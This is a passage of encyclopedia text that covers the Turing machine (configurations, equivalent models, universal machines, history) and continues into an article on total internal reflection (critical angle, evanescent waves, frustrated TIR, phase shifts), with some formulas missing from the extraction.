"the state formula" includes both the current instruction and all the symbols on the tape: Earlier in his paper Turing carried this even further: he gives an example where he placed a symbol of the current "m-configuration"—the instruction's label—beneath the scanned square, together with all the symbols on the tape (The Undecidable, p. 121); this he calls "the complete configuration" (The Undecidable, p. 118). To print the "complete configuration" on one line, he places the state-label/m-configuration to the left of the scanned symbol. A variant of this is seen in Kleene (1952) where Kleene shows how to write the Gödel number of a machine's "situation": he places the "m-configuration" symbol q4 over the scanned square in roughly the center of the 6 non-blank squares on the tape (see the Turing-tape figure in this article) and puts it to the right of the scanned square. But Kleene refers to "q4" itself as "the machine state" (Kleene, p. 374–375). Hopcroft and Ullman call this composite the "instantaneous description" and follow the Turing convention of putting the "current state" (instruction-label, m-configuration) to the left of the scanned symbol (p. 149), that is, the instantaneous description is the composite of non-blank symbols to the left, state of the machine, the current symbol scanned by the head, and the non-blank symbols to the right. Example: total state of 3-state 2-symbol busy beaver after 3 "moves" (taken from example "run" in the figure below): 1A1 This means: after three moves the tape has ... 000110000 ... on it, the head is scanning the right-most 1, and the state is A. Blanks (in this case represented by "0"s) can be part of the total state as shown here: B01; the tape has a single 1 on it, but the head is scanning the 0 ("blank") to its left and the state is B. "State" in the context of Turing machines should be clarified as to which is being described: the current instruction, or the list of symbols on the tape together with the current instruction, or the list of symbols on the tape together with the current instruction placed to the left of the scanned symbol or to the right of the scanned symbol. Turing's biographer Andrew Hodges (1983: 107) has noted and discussed this confusion. "State" diagrams To the right: the above table as expressed as a "state transition" diagram. Usually large tables are better left as tables (Booth, p. 74). They are more readily simulated by computer in tabular form (Booth, p. 74). However, certain concepts—e.g. machines with "reset" states and machines with repeating patterns (cf. Hill and Peterson p. 244ff)—can be more readily seen when viewed as a drawing. Whether a drawing represents an improvement on its table must be decided by the reader for the particular context. The reader should again be cautioned that such diagrams represent a snapshot of their table frozen in time, not the course ("trajectory") of a computation through time and space. While every time the busy beaver machine "runs" it will always follow the same state-trajectory, this is not true for the "copy" machine that can be provided with variable input "parameters". The diagram "progress of the computation" shows the three-state busy beaver's "state" (instruction) progress through its computation from start to finish. On the far right is the Turing "complete configuration" (Kleene "situation", Hopcroft–Ullman "instantaneous description") at each step. If the machine were to be stopped and cleared to blank both the "state register" and entire tape, these "configurations" could be used to rekindle a computation anywhere in its progress (cf. Turing (1936) The Undecidable, pp. 139–140). Equivalent models Many machines that might be thought to have more computational capability than a simple universal Turing machine can be shown to have no more power (Hopcroft and Ullman p. 159, cf. Minsky (1967)). They might compute faster, perhaps, or use less memory, or their instruction set might be smaller, but they cannot compute more powerfully (i.e. more mathematical functions). (The Church–Turing thesis hypothesises this to be true for any kind of machine: that anything that can be "computed" can be computed by some Turing machine.) A Turing machine is equivalent to a single-stack pushdown automaton (PDA) that has been made more flexible and concise by relaxing the last-in-first-out (LIFO) requirement of its stack. In addition, a Turing machine is also equivalent to a two-stack PDA with standard LIFO semantics, by using one stack to model the tape left of the head and the other stack for the tape to the right. At the other extreme, some very simple models turn out to be Turing-equivalent, i.e. to have the same computational power as the Turing machine model. Common equivalent models are the multi-tape Turing machine, multi-track Turing machine, machines with input and output, and the non-deterministic Turing machine (NDTM) as opposed to the deterministic Turing machine (DTM) for which the action table has at most one entry for each combination of symbol and state. Read-only, right-moving Turing machines are equivalent to DFAs (as well as NFAs by conversion using the NFA to DFA conversion algorithm). For practical and didactic intentions, the equivalent register machine can be used as a usual assembly programming language. A relevant question is whether or not the computation model represented by concrete programming languages is Turing equivalent. While the computation of a real computer is based on finite states and thus not capable to simulate a Turing machine, programming languages themselves do not necessarily have this limitation. Kirner et al., 2009 have shown that among the general-purpose programming languages some are Turing complete while others are not. For example, ANSI C is not Turing complete, as all instantiations of ANSI C (different instantiations are possible as the standard deliberately leaves certain behaviour undefined for legacy reasons) imply a finite-space memory. This is because the size of memory reference data types, called pointers, is accessible inside the language. However, other programming languages like Pascal do not have this feature, which allows them to be Turing complete in principle. It is just Turing complete in principle, as memory allocation in a programming language is allowed to fail, which means the programming language can be Turing complete when ignoring failed memory allocations, but the compiled programs executable on a real computer cannot. Choice c-machines, oracle o-machines Early in his paper (1936) Turing makes a distinction between an "automatic machine"—its "motion ... completely determined by the configuration" and a "choice machine": Turing (1936) does not elaborate further except in a footnote in which he describes how to use an a-machine to "find all the provable formulae of the [Hilbert] calculus" rather than use a choice machine. He "suppose[s] that the choices are always between two possibilities 0 and 1. Each proof will then be determined by a sequence of choices i1, i2, ..., in (i1 = 0 or 1, i2 = 0 or 1, ..., in = 0 or 1), and hence the number 2n + i12n-1 + i22n-2 + ... +in completely determines the proof. The automatic machine carries out successively proof 1, proof 2, proof 3, ..." (Footnote ‡, The Undecidable, p. 138) This is indeed the technique by which a deterministic (i.e., a-) Turing machine can be used to mimic the action of a nondeterministic Turing machine; Turing solved the matter in a footnote and appears to dismiss it from further consideration. An oracle machine or o-machine is a Turing a-machine that pauses its computation at state "o" while, to complete its calculation, it "awaits the decision" of "the oracle"—an entity unspecified by Turing "apart from saying that it cannot be a machine" (Turing (1939), The Undecidable, p. 166–168). Universal Turing machines As Turing wrote in The Undecidable, p. 128 (italics added): This finding is now taken for granted, but at the time (1936) it was considered astonishing. The model of computation that Turing called his "universal machine"—"U" for short—is considered by some (cf. Davis (2000)) to have been the fundamental theoretical breakthrough that led to the notion of the stored-program computer. In terms of computational complexity, a multi-tape universal Turing machine need only be slower by logarithmic factor compared to the machines it simulates. This result was obtained in 1966 by F. C. Hennie and R. E. Stearns. (Arora and Barak, 2009, theorem 1.9) Comparison with real machines Turing machines are more powerful than some other kinds of automata, such as finite-state machines and pushdown automata. According to the Church–Turing thesis, they are as powerful as real machines, and are able to execute any operation that a real program can. What is neglected in this statement is that, because a real machine can only have a finite number of configurations, it is nothing but a finite-state machine, whereas a Turing machine has an unlimited amount of storage space available for its computations. There are a number of ways to explain why Turing machines are useful models of real computers: Anything a real computer can compute, a Turing machine can also compute. For example: "A Turing machine can simulate any type of subroutine found in programming languages, including recursive procedures and any of the known parameter-passing mechanisms" (Hopcroft and Ullman p. 157). A large enough FSA can also model any real computer, disregarding IO. Thus, a statement about the limitations of Turing machines will also apply to real computers. The difference lies only with the ability of a Turing machine to manipulate an unbounded amount of data. However, given a finite amount of time, a Turing machine (like a real machine) can only manipulate a finite amount of data. Like a Turing machine, a real machine can have its storage space enlarged as needed, by acquiring more disks or other storage media. Descriptions of real machine programs using simpler abstract models are often much more complex than descriptions using Turing machines. For example, a Turing machine describing an algorithm may have a few hundred states, while the equivalent deterministic finite automaton (DFA) on a given real machine has quadrillions. This makes the DFA representation infeasible to analyze. Turing machines describe algorithms independent of how much memory they use. There is a limit to the memory possessed by any current machine, but this limit can rise arbitrarily in time. Turing machines allow us to make statements about algorithms which will (theoretically) hold forever, regardless of advances in conventional computing machine architecture. Algorithms running on Turing-equivalent abstract machines can have arbitrary-precision data types available and never have to deal with unexpected conditions (including, but not limited to, running out of memory). Limitations Computational complexity theory A limitation of Turing machines is that they do not model the strengths of a particular arrangement well. For instance, modern stored-program computers are actually instances of a more specific form of abstract machine known as the random-access stored-program machine or RASP machine model. Like the universal Turing machine, the RASP stores its "program" in "memory" external to its finite-state machine's "instructions". Unlike the universal Turing machine, the RASP has an infinite number of distinguishable, numbered but unbounded "registers"—memory "cells" that can contain any integer (cf. Elgot and Robinson (1964), Hartmanis (1971), and in particular Cook-Rechow (1973); references at random-access machine). The RASP's finite-state machine is equipped with the capability for indirect addressing (e.g., the contents of one register can be used as an address to specify another register); thus the RASP's "program" can address any register in the register-sequence. The upshot of this distinction is that there are computational optimizations that can be performed based on the memory indices, which are not possible in a general Turing machine; thus when Turing machines are used as the basis for bounding running times, a "false lower bound" can be proven on certain algorithms' running times (due to the false simplifying assumption of a Turing machine). An example of this is binary search, an algorithm that can be shown to perform more quickly when using the RASP model of computation rather than the Turing machine model. Interaction In the early days of computing, computer use was typically limited to batch processing, i.e., non-interactive tasks, each producing output data from given input data. Computability theory, which studies computability of functions from inputs to outputs, and for which Turing machines were invented, reflects this practice. Since the 1970s, interactive use of computers became much more common. In principle, it is possible to model this by having an external agent read from the tape and write to it at the same time as a Turing machine, but this rarely matches how interaction actually happens; therefore, when describing interactivity, alternatives such as I/O automata are usually preferred. Comparison with the arithmetic model of computation The arithmetic model of computation differs from the Turing model in two aspects: In the arithmetic model, every real number requires a single memory cell, whereas in the Turing model the storage size of a real number depends on the number of bits required to represent it. In the arithmetic model, every basic arithmetic operation on real numbers (addition, subtraction, multiplication and division) can be done in a single step, whereas in the Turing model the run-time of each arithmetic operation depends on the length of the operands. Some algorithms run in polynomial time in one model but not in the other one. For example: The Euclidean algorithm runs in polynomial time in the Turing model, but not in the arithmetic model. The algorithm that reads n numbers and then computes by repeated squaring runs in polynomial time in the Arithmetic model, but not in the Turing model. This is because the number of bits required to represent the outcome is exponential in the input size. However, if an algorithm runs in polynomial time in the arithmetic model, and in addition, the binary length of all involved numbers is polynomial in the length of the input, then it is always polynomial-time in the Turing model. Such an algorithm is said to run in strongly polynomial time. History Historical background: computational machinery Robin Gandy (1919–1995)—a student of Alan Turing (1912–1954), and his lifelong friend—traces the lineage of the notion of "calculating machine" back to Charles Babbage (circa 1834) and actually proposes "Babbage's Thesis": Gandy's analysis of Babbage's analytical engine describes the following five operations (cf. p. 52–53): The arithmetic functions +, −, ×, where − indicates "proper" subtraction: if . Any sequence of operations is an operation. Iteration of an operation (repeating n times an operation P). Conditional iteration (repeating n times an operation P conditional on the "success" of test T). Conditional transfer (i.e., conditional "goto"). Gandy states that "the functions which can be calculated by (1), (2), and (4) are precisely those which are Turing computable." (p. 53). He cites other proposals for "universal calculating machines" including those of Percy Ludgate (1909), Leonardo Torres Quevedo (1914), Maurice d'Ocagne (1922), Louis Couffignal (1933), Vannevar Bush (1936), Howard Aiken (1937). However: The Entscheidungsproblem (the "decision problem"): Hilbert's tenth question of 1900 With regard to Hilbert's problems posed by the famous mathematician David Hilbert in 1900, an aspect of problem #10 had been floating about for almost 30 years before it was framed precisely. Hilbert's original expression for No. 10 is as follows: By 1922, this notion of "Entscheidungsproblem" had developed a bit, and H. Behmann stated that By the 1928 international congress of mathematicians, Hilbert "made his questions quite precise. First, was mathematics complete ... Second, was mathematics consistent ... And thirdly, was mathematics decidable?" (Hodges p. 91, Hawking p. 1121). The first two questions were answered in 1930 by Kurt Gödel at the very same meeting where Hilbert delivered his retirement speech (much to the chagrin of Hilbert); the third—the Entscheidungsproblem—had to wait until the mid-1930s. The problem was that an answer first required a precise definition of "definite general applicable prescription", which Princeton professor Alonzo Church would come to call "effective calculability", and in 1928 no such definition existed. But over the next 6–7 years Emil Post developed his definition of a worker moving from room to room writing and erasing marks per a list of instructions (Post 1936), as did Church and his two students Stephen Kleene and J. B. Rosser by use of Church's lambda-calculus and Gödel's recursion theory (1934). Church's paper (published 15 April 1936) showed that the Entscheidungsproblem was indeed "undecidable" and beat Turing to the punch by almost a year (Turing's paper submitted 28 May 1936, published January 1937). In the meantime, Emil Post submitted a brief paper in the fall of 1936, so Turing at least had priority over Post. While Church refereed Turing's paper, Turing had time to study Church's paper and add an Appendix where he sketched a proof that Church's lambda-calculus and his machines would compute the same functions. And Post had only proposed a definition of calculability and criticised Church's "definition", but had proved nothing. Alan Turing's a-machine In the spring of 1935, Turing as a young Master's student at King's College, Cambridge, took on the challenge; he had been stimulated by the lectures of the logician M. H. A. Newman "and learned from them of Gödel's work and the Entscheidungsproblem ... Newman used the word 'mechanical' ... In his obituary of Turing 1955 Newman writes: Gandy states that: While Gandy believed that Newman's statement above is "misleading", this opinion is not shared by all. Turing had a lifelong interest in machines: "Alan had dreamt of inventing typewriters as a boy; [his mother] Mrs. Turing had a typewriter; and he could well have begun by asking himself what was meant by calling a typewriter 'mechanical'" (Hodges p. 96). While at Princeton pursuing his PhD, Turing built a Boolean-logic multiplier (see below). His PhD thesis, titled "Systems of Logic Based on Ordinals", contains the following definition of "a computable function": Alan Turing invented the "a-machine" (automatic machine) in 1936. Turing submitted his paper on 31 May 1936 to the London Mathematical Society for its Proceedings (cf. Hodges 1983:112), but it was published in early 1937 and offprints were available in February 1937 (cf. Hodges 1983:129) It was Turing's doctoral advisor, Alonzo Church, who later coined the term "Turing machine" in a review. With this model, Turing was able to answer two questions in the negative: Does a machine exist that can determine whether any arbitrary machine on its tape is "circular" (e.g., freezes, or fails to continue its computational task)? Does a machine exist that can determine whether any arbitrary machine on its tape ever prints a given symbol? Thus by providing a mathematical description of a very simple device capable of arbitrary computations, he was able to prove properties of computation in general—and in particular, the uncomputability of the Entscheidungsproblem ('decision problem'). When Turing returned to the UK he ultimately became jointly responsible for breaking the German secret codes created by encryption machines called "The Enigma"; he also became involved in the design of the ACE (Automatic Computing Engine), "[Turing's] ACE proposal was effectively self-contained, and its roots lay not in the EDVAC [the USA's initiative], but in his own universal machine" (Hodges p. 318). Arguments still continue concerning the origin and nature of what has been named by Kleene (1952) Turing's Thesis. But what Turing did prove with his computational-machine model appears in his paper "On Computable Numbers, with an Application to the Entscheidungsproblem" (1937): Turing's example (his second proof): If one is to ask for a general procedure to tell us: "Does this machine ever print 0", the question is "undecidable". 1937–1970: The "digital computer", the birth of "computer science" In 1937, while at Princeton working on his PhD thesis, Turing built a digital (Boolean-logic) multiplier from scratch, making his own electromechanical relays (Hodges p. 138). "Alan's task was to embody the logical design of a Turing machine in a network of relay-operated switches ..." (Hodges p. 138). While Turing might have been just initially curious and experimenting, quite-earnest work in the same direction was going in Germany (Konrad Zuse (1938)), and in the United States (Howard Aiken) and George Stibitz (1937); the fruits of their labors were used by both the Axis and Allied militaries in World War II (cf. Hodges p. 298–299). In the early to mid-1950s Hao Wang and Marvin Minsky reduced the Turing machine to a simpler form (a precursor to the Post–Turing machine of Martin Davis); simultaneously European researchers were reducing the new-fangled electronic computer to a computer-like theoretical object equivalent to what was now being called a "Turing machine". In the late 1950s and early 1960s, the coincidentally parallel developments of Melzak and Lambek (1961), Minsky (1961), and Shepherdson and Sturgis (1961) carried the European work further and reduced the Turing machine to a more friendly, computer-like abstract model called the counter machine; Elgot and Robinson (1964), Hartmanis (1971), Cook and Reckhow (1973) carried this work even further with the register machine and random-access machine models—but basically all are just multi-tape Turing machines with an arithmetic-like instruction set. 1970–present: as a model of computation Today, the counter, register and random-access machines and their sire the Turing machine continue to be the models of choice for theorists investigating questions in the theory of computation. In particular, computational complexity theory makes use of the Turing machine:
Mathematics
Computability theory
null
30426
https://en.wikipedia.org/wiki/Total%20internal%20reflection
Total internal reflection
In physics, total internal reflection (TIR) is the phenomenon in which waves arriving at the interface (boundary) from one medium to another (e.g., from water to air) are not refracted into the second ("external") medium, but completely reflected back into the first ("internal") medium. It occurs when the second medium has a higher wave speed (i.e., lower refractive index) than the first, and the waves are incident at a sufficiently oblique angle on the interface. For example, the water-to-air surface in a typical fish tank, when viewed obliquely from below, reflects the underwater scene like a mirror with no loss of brightness (Fig.1). TIR occurs not only with electromagnetic waves such as light and microwaves, but also with other types of waves, including sound and water waves. If the waves are capable of forming a narrow beam (Fig.2), the reflection tends to be described in terms of "rays" rather than waves; in a medium whose properties are independent of direction, such as air, water or glass, the "rays" are perpendicular to associated wavefronts. The total internal reflection occurs when critical angle is exceeded. Refraction is generally accompanied by partial reflection. When waves are refracted from a medium of lower propagation speed (higher refractive index) to a medium of higher propagation speed (lower refractive index)—e.g., from water to air—the angle of refraction (between the outgoing ray and the surface normal) is greater than the angle of incidence (between the incoming ray and the normal). As the angle of incidence approaches a certain threshold, called the critical angle, the angle of refraction approaches 90°, at which the refracted ray becomes parallel to the boundary surface. As the angle of incidence increases beyond the critical angle, the conditions of refraction can no longer be satisfied, so there is no refracted ray, and the partial reflection becomes total. For visible light, the critical angle is about 49° for incidence from water to air, and about 42° for incidence from common glass to air. Details of the mechanism of TIR give rise to more subtle phenomena. While total reflection, by definition, involves no continuing flow of power across the interface between the two media, the external medium carries a so-called evanescent wave, which travels along the interface with an amplitude that falls off exponentially with distance from the interface. The "total" reflection is indeed total if the external medium is lossless (perfectly transparent), continuous, and of infinite extent, but can be conspicuously less than total if the evanescent wave is absorbed by a lossy external medium ("attenuated total reflectance"), or diverted by the outer boundary of the external medium or by objects embedded in that medium ("frustrated" TIR). Unlike partial reflection between transparent media, total internal reflection is accompanied by a non-trivial phase shift (not just zero or 180°) for each component of polarization (perpendicular or parallel to the plane of incidence), and the shifts vary with the angle of incidence. The explanation of this effect by Augustin-Jean Fresnel, in 1823, added to the evidence in favor of the wave theory of light. The phase shifts are used by Fresnel's invention, the Fresnel rhomb, to modify polarization. The efficiency of the total internal reflection is exploited by optical fibers (used in telecommunications cables and in image-forming fiberscopes), and by reflective prisms, such as image-erecting Porro/roof prisms for monoculars and binoculars. Optical description Although total internal reflection can occur with any kind of wave that can be said to have oblique incidence, including (e.g.) microwaves and sound waves, it is most familiar in the case of light waves. Total internal reflection of light can be demonstrated using a semicircular-cylindrical block of common glass or acrylic glass. In Fig.3, a "ray box" projects a narrow beam of light (a "ray") radially inward. The semicircular cross-section of the glass allows the incoming ray to remain perpendicular to the curved portion of the air/glass surface, and then hence to continue in a straight line towards the flat part of the surface, although its angle with the flat part varies. Where the ray meets the flat glass-to-air interface, the angle between the ray and the normal (perpendicular) to the interface is called the angle of incidence. If this angle is sufficiently small, the ray is partly reflected but mostly transmitted, and the transmitted portion is refracted away from the normal, so that the angle of refraction (between the refracted ray and the normal to the interface) is greater than the angle of incidence. For the moment, let us call the angle of incidence θ and the angle of refraction θt (where t is for transmitted, reserving r for reflected). As θ increases and approaches a certain "critical angle", denoted by θc (or sometimes θcr), the angle of refraction approaches 90° (that is, the refracted ray approaches a tangent to the interface), and the refracted ray becomes fainter while the reflected ray becomes brighter. As θ increases beyond θc, the refracted ray disappears and only the reflected ray remains, so that all of the energy of the incident ray is reflected; this is total internal reflection (TIR). In brief: If θ < θc, the incident ray is split, being partly reflected and partly refracted; If θ > θc, the incident ray suffers total internal reflection (TIR); none of it is transmitted. Critical angle The critical angle is the smallest angle of incidence that yields total reflection, or equivalently the largest angle for which a refracted ray exists. For light waves incident from an "internal" medium with a single refractive index , to an "external" medium with a single refractive index , the critical angle is given by and is defined if . For some other types of waves, it is more convenient to think in terms of propagation velocities rather than refractive indices. The explanation of the critical angle in terms of velocities is more general and will therefore be discussed first. When a wavefront is refracted from one medium to another, the incident (incoming) and refracted (outgoing) portions of the wavefront meet at a common line on the refracting surface (interface). Let this line, denoted by L, move at velocity across the surface, where is measured normal to L (Fig.4). Let the incident and refracted wavefronts propagate with normal velocities and respectively, and let them make the dihedral angles θ1 and θ2 respectively with the interface. From the geometry, is the component of in the direction normal to the incident wave, so that Similarly, Solving each equation for and equating the results, we obtain the general law of refraction for waves: But the dihedral angle between two planes is also the angle between their normals. So θ1 is the angle between the normal to the incident wavefront and the normal to the interface, while θ2 is the angle between the normal to the refracted wavefront and the normal to the interface; and Eq.() tells us that the sines of these angles are in the same ratio as the respective velocities. This result has the form of "Snell's law", except that we have not yet said that the ratio of velocities is constant, nor identified θ1 and θ2 with the angles of incidence and refraction (called θi and θt above). However, if we now suppose that the properties of the media are isotropic (independent of direction), two further conclusions follow: first, the two velocities, and hence their ratio, are independent of their directions; and second, the wave-normal directions coincide with the ray directions, so that θ1 and θ2 coincide with the angles of incidence and refraction as defined above. Obviously the angle of refraction cannot exceed 90°. In the limiting case, we put and in Eq.(), and solve for the critical angle: In deriving this result, we retain the assumption of isotropic media in order to identify θ1 and θ2 with the angles of incidence and refraction. For electromagnetic waves, and especially for light, it is customary to express the above results in terms of refractive indices. The refractive index of a medium with normal velocity is defined as where c is the speed of light in vacuum. Hence Similarly, Making these substitutions in Eqs.() and (), we obtain and Eq.() is the law of refraction for general media, in terms of refractive indices, provided that θ1 and θ2 are taken as the dihedral angles; but if the media are isotropic, then and become independent of direction, while θ1 and θ2 may be taken as the angles of incidence and refraction for the rays, and Eq.() follows. So, for isotropic media, Eqs.() and () together describe the behavior in Fig.5. According to Eq.(), for incidence from water () to air (), we have , whereas for incidence from common or acrylic glass () to air (), we have . The arcsin function yielding θc is defined only if Hence, for isotropic media, total internal reflection cannot occur if the second medium has a higher refractive index (lower normal velocity) than the first. For example, there cannot be TIR for incidence from air to water; rather, the critical angle for incidence from water to air is the angle of refraction at grazing incidence from air to water (Fig.6). The medium with the higher refractive index is commonly described as optically denser, and the one with the lower refractive index as optically rarer. Hence it is said that total internal reflection is possible for "dense-to-rare" incidence, but not for "rare-to-dense" incidence. Everyday examples When standing beside an aquarium with one's eyes below the water level, one is likely to see fish or submerged objects reflected in the water-air surface (Fig.1). The brightness of the reflected image – just as bright as the "direct" view – can be startling. A similar effect can be observed by opening one's eyes while swimming just below the water's surface. If the water is calm, the surface outside the critical angle (measured from the vertical) appears mirror-like, reflecting objects below. The region above the water cannot be seen except overhead, where the hemispherical field of view is compressed into a conical field known as Snell's window, whose angular diameter is twice the critical angle (cf. Fig.6). The field of view above the water is theoretically 180° across, but seems less because as we look closer to the horizon, the vertical dimension is more strongly compressed by the refraction; e.g., by Eq.(), for air-to-water incident angles of 90°, 80°, and 70°, the corresponding angles of refraction are 48.6° (θcr in Fig.6), 47.6°, and 44.8°, indicating that the image of a point 20° above the horizon is 3.8° from the edge of Snell's window while the image of a point 10° above the horizon is only 1° from the edge. Fig.7, for example, is a photograph taken near the bottom of the shallow end of a swimming pool. What looks like a broad horizontal stripe on the right-hand wall consists of the lower edges of a row of orange tiles, and their reflections; this marks the water level, which can then be traced across the other wall. The swimmer has disturbed the surface above her, scrambling the lower half of her reflection, and distorting the reflection of the ladder (to the right). But most of the surface is still calm, giving a clear reflection of the tiled bottom of the pool. The space above the water is not visible except at the top of the frame, where the handles of the ladder are just discernible above the edge of Snell's window – within which the reflection of the bottom of the pool is only partial, but still noticeable in the photograph. One can even discern the color-fringing of the edge of Snell's window, due to variation of the refractive index, hence of the critical angle, with wavelength (see Dispersion). The critical angle influences the angles at which gemstones are cut. The round "brilliant" cut, for example, is designed to refract light incident on the front facets, reflect it twice by TIR off the back facets, and transmit it out again through the front facets, so that the stone looks bright. Diamond (Fig.8) is especially suitable for this treatment, because its high refractive index (about 2.42) and consequently small critical angle (about 24.5°) yield the desired behavior over a wide range of viewing angles. Cheaper materials that are similarly amenable to this treatment include cubic zirconia (index≈2.15) and moissanite (non-isotropic, hence doubly refractive, with an index ranging from about 2.65 to 2.69, depending on direction and polarization); both of these are therefore popular as diamond simulants. Evanescent wave Mathematically, waves are described in terms of time-varying fields, a "field" being a function of location in space. A propagating wave requires an "effort" field and a "flow" field, the latter being a vector (if we are working in two or three dimensions). The product of effort and flow is related to power (see System equivalence). For example, for sound waves in a non-viscous fluid, we might take the effort field as the pressure (a scalar), and the flow field as the fluid velocity (a vector). The product of these two is intensity (power per unit area). For electromagnetic waves, we shall take the effort field as the electric field and the flow field as the magnetizing field . Both of these are vectors, and their vector product is again the intensity (see Poynting vector). When a wave in (say) medium 1 is reflected off the interface between medium 1 and medium 2, the flow field in medium 1 is the vector sum of the flow fields due to the incident and reflected waves. If the reflection is oblique, the incident and reflected fields are not in opposite directions and therefore cannot cancel out at the interface; even if the reflection is total, either the normal component or the tangential component of the combined field (as a function of location and time) must be non-zero adjacent to the interface. Furthermore, the physical laws governing the fields will generally imply that one of the two components is continuous across the interface (that is, it does not suddenly change as we cross the interface); for example, for electromagnetic waves, one of the interface conditions is that the tangential component of is continuous if there is no surface current. Hence, even if the reflection is total, there must be some penetration of the flow field into medium 2; and this, in combination with the laws relating the effort and flow fields, implies that there will also be some penetration of the effort field. The same continuity condition implies that the variation ("waviness") of the field in medium 2 will be synchronized with that of the incident and reflected waves in medium 1. But, if the reflection is total, the spatial penetration of the fields into medium 2 must be limited somehow, or else the total extent and hence the total energy of those fields would continue to increase, draining power from medium 1. Total reflection of a continuing wavetrain permits some energy to be stored in medium 2, but does not permit a continuing transfer of power from medium 1 to medium 2. Thus, using mostly qualitative reasoning, we can conclude that total internal reflection must be accompanied by a wavelike field in the "external" medium, traveling along the interface in synchronism with the incident and reflected waves, but with some sort of limited spatial penetration into the "external" medium; such a field may be called an evanescent wave. Fig.9 shows the basic idea. The incident wave is assumed to be plane and sinusoidal. The reflected wave, for simplicity, is not shown. The evanescent wave travels to the right in lock-step with the incident and reflected waves, but its amplitude falls off with increasing distance from the interface. (Two features of the evanescent wave in Fig.9 are to be explained later: first, that the evanescent wave crests are perpendicular to the interface; and second, that the evanescent wave is slightly ahead of the incident wave.) Frustrated total internal reflection (FTIR) If the internal reflection is to be total, there must be no diversion of the evanescent wave. Suppose, for example, that electromagnetic waves incident from glass (with a higher refractive index) to air (with a lower refractive index) at a certain angle of incidence are subject to TIR. And suppose that we have a third medium (often identical to the first) whose refractive index is sufficiently high that, if the third medium were to replace the second, we would get a standard transmitted wavetrain for the same angle of incidence. Then, if the third medium is brought within a distance of a few wavelengths from the surface of the first medium, where the evanescent wave has significant amplitude in the second medium, then the evanescent wave is effectively refracted into the third medium, giving non-zero transmission into the third medium, and therefore less than total reflection back into the first medium. As the amplitude of the evanescent wave decays across the air gap, the transmitted waves are attenuated, so that there is less transmission, and therefore more reflection, than there would be with no gap; but as long as there is some transmission, the reflection is less than total. This phenomenon is called frustrated total internal reflection (where "frustrated" negates "total"), abbreviated "frustrated TIR" or "FTIR". Frustrated TIR can be observed by looking into the top of a glass of water held in one's hand (Fig.10). If the glass is held loosely, contact may not be sufficiently close and widespread to produce a noticeable effect. But if it is held more tightly, the ridges of one's fingerprints interact strongly with the evanescent waves, allowing the ridges to be seen through the otherwise totally reflecting glass-air surface. The same effect can be demonstrated with microwaves, using paraffin wax as the "internal" medium (where the incident and reflected waves exist). In this case the permitted gap width might be (e.g.) 1cm or several cm, which is easily observable and adjustable. The term frustrated TIR also applies to the case in which the evanescent wave is scattered by an object sufficiently close to the reflecting interface. This effect, together with the strong dependence of the amount of scattered light on the distance from the interface, is exploited in total internal reflection microscopy. The mechanism of FTIR is called evanescent-wave coupling, and is a good analog to visualize quantum tunneling. Due to the wave nature of matter, an electron has a non-zero probability of "tunneling" through a barrier, even if classical mechanics would say that its energy is insufficient. Similarly, due to the wave nature of light, a photon has a non-zero probability of crossing a gap, even if ray optics would say that its approach is too oblique. Another reason why internal reflection may be less than total, even beyond the critical angle, is that the external medium may be "lossy" (less than perfectly transparent), in which case the external medium will absorb energy from the evanescent wave, so that the maintenance of the evanescent wave will draw power from the incident wave. The consequent less-than-total reflection is called attenuated total reflectance (ATR). This effect, and especially the frequency-dependence of the absorption, can be used to study the composition of an unknown external medium. Derivation of evanescent wave In a uniform plane sinusoidal electromagnetic wave, the electric field has the form where is the (constant) complex amplitude vector, is the imaginary unit, is the wave vector (whose magnitude is the angular wavenumber), is the position vector, ω is the angular frequency, is time, and it is understood that the real part of the expression is the physical field. The magnetizing field has the same form with the same and ω. The value of the expression is unchanged if the position varies in a direction normal to ; hence is normal to the wavefronts. If ℓ is the component of in the direction of the field () can be written If the argument of is to be constant, ℓ must increase at the velocity known as the phase velocity. This in turn is equal to where is the phase velocity in the reference medium (taken as vacuum), and is the local refractive index w.r.t. the reference medium. Solving for gives i.e. where is the wavenumber in vacuum. From (), the electric field in the "external" medium has the form where is the wave vector for the transmitted wave (we assume isotropic media, but the transmitted wave is not yet assumed to be evanescent). In Cartesian coordinates , let the region have refractive index and let the region have refractive index . Then the plane is the interface, and the axis is normal to the interface (Fig.11). Let and be the unit vectors in the and directions respectively. Let the plane of incidence (containing the incident wave-normal and the normal to the interface) be the plane (the plane of the page), with the angle of incidence θi measured from towards . Let the angle of refraction, measured in the same sense, be θt ("t" for transmitted, reserving "r" for reflected). From (), the transmitted wave vector has magnitude . Hence, from the geometry, where the last step uses Snell's law. Taking the dot product with the position vector, we get so that Eq.() becomes In the case of TIR, the angle θt does not exist in the usual sense. But we can still interpret () for the transmitted (evanescent) wave by allowing to be complex. This becomes necessary when we write in terms of and thence in terms of using Snell's law: For θi greater than the critical angle, the value under the square-root symbol is negative, so that To determine which sign is applicable, we substitute () into (), obtaining where the undetermined sign is the opposite of that in (). For an evanescent transmitted wave that is, one whose amplitude decays as increases the undetermined sign in () must be minus, so the undetermined sign in () must be plus. With the correct sign, the result () can be abbreviated where and is the wavenumber in vacuum, i.e.  So the evanescent wave is a plane sinewave traveling in the direction, with an amplitude that decays exponentially in the direction (Fig.9). It is evident that the energy stored in this wave likewise travels in the direction and does not cross the interface. Hence the Poynting vector generally has a component in the direction, but its component averages to zero (although its instantaneous component is not identically zero). Eq.() indicates that the amplitude of the evanescent wave falls off by a factor as the coordinate (measured from the interface) increases by the distance commonly called the "penetration depth" of the evanescent wave. Taking reciprocals of the first equation of (), we find that the penetration depth is where λ0 is the wavelength in vacuum, i.e. Dividing the numerator and denominator by yields where is the wavelength in the second (external) medium. Hence we can plot in units of λ2 as a function of the angle of incidence for various values of (Fig.12). As θi decreases towards the critical angle, the denominator approaches zero, so that increases without limit as is to be expected, because as soon as θi is less than critical, uniform plane waves are permitted in the external medium. As θi approaches 90° (grazing incidence), approaches a minimum For incidence from water to air, or common glass to air, is not much different from λ2/(2π). But is larger at smaller angles of incidence (Fig.12), and the amplitude may still be significant at distances of several times ; for example, because is just greater than 0.01, the evanescent wave amplitude within a distance of the interface is at least 1% of its value at the interface. Hence, speaking loosely, we tend to say that the evanescent wave amplitude is significant within "a few wavelengths" of the interface. Phase shifts Between 1817 and 1823, Augustin-Jean Fresnel discovered that total internal reflection is accompanied by a non-trivial phase shift (that is, a phase shift that is not restricted to 0° or 180°), as the Fresnel reflection coefficient acquires a non-zero imaginary part. We shall now explain this effect for electromagnetic waves in the case of linear, homogeneous, isotropic, non-magnetic media. The phase shift turns out to be an advance, which grows as the incidence angle increases beyond the critical angle, but which depends on the 